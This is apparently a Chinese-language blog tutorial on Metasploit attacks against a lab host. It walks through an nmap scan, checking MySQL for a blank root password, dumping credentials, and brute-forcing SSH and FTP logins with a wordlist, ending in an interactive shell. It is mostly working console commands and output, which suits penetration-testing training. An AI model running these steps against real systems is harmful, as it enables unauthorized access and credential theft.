1.1 Metasploit攻击实例
1.1.1 攻击空密码的mysql服务
1.1.1.1 扫描主机并导入metasploit
# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml msf6 > db_import /tmp/192.168.1.120.xml msf6 > hosts -R 192.168.1.120
msf6 > services -R 192.168.1.120
1.1.1.2 验证主机是否存在mysql空密码漏洞
msf6 > search mysql type:auxiliary
msf6 > use auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > show options
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root USERNAME => root msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/mysql/mysql_login) > run
1.1.1.3 获取数据库中所有凭证
msf6 auxiliary(scanner/mysql/mysql_login) > creds
1.1.1.4 导出扫描结果给其他metasploit使用
msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml [*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]... [*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
1.1.2 暴力破解SSH
1.1.2.1 对ssh进行暴力破解
msf6 > search ssh_login
msf6 > use 0 msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/ssh/ssh_login) > exploit
1.1.2.2 破解后进行验证
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8 [*] Starting interaction with 8... whoami msfadmin ls vulnerable background Background session 9? [y/N] y
1.1.3 暴力破解FTP
1.1.3.1 对ftp进行暴力破解
msf6 > search ftp_login
msf6 > use 0 msf6 auxiliary(scanner/ftp/ftp_login) > show options
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/ftp/ftp_login) > exploit
温馨提示:本文最后更新于
转载请注明本文链接:https://blog.leonshadow.cn/763482/2965.html
2022-12-20 20:57:32
,已超过456
天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!转载请注明本文链接:https://blog.leonshadow.cn/763482/2965.html
© 版权声明
THE END